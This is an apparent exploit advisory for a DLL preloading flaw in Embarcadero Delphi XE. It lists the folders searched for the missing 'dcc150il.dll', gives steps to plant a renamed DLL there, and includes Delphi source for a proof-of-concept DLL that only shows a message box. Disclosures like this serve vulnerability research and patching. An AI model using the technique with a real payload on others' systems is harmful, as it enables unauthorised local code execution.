|
Exploit Title : [Embarcadero Delphi XE (2011), DLL preloading exploit]
Author : [STRELiTZIA]
Software : [Delphi XE (2011)]
Tested on : [Windows Xp SP3]
============================
= Description =
============================
Delphi XE, searchs and laods INEXISTENT "dcc150il.dll" library without checks, or any visual warning messages related to library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.
============================
= Instructions =
============================
Default searching folders:
%C%:\Program Files\Embarcadero\RAD Studio\8.0\bin\dcc150il.dll
%C%:\WINDOWS\system32\dcc150il.dll
%C%:\WINDOWS\system\dcc150il.dll
%C%:\WINDOWS\dcc150il.dll
%C%:\Documents and Settings\%User%\%My documents%\RAD Studio\Projects\dcc150il.dll
%C%:\Documents and Settings\All Users\Documents\RAD Studio\8.0\BPL\dcc150il.dll
%C%:\WINDOWS\system32\wbem\dcc150il.dll
1- Copy "Test.dll" into "One of listed folders"
2- Rename "Test.dll" to "dcc150il.dll"
============================
= Tests =
============================
- Launch Embarcadero Delphi XE.
- File ->> New ->> VCL Forms application - Delphi.
============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
Windows;
begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission.'),
PChar('Sample'),
MB_ICONSTOP
);
end.
|
| |
|
推荐
评论(0条)
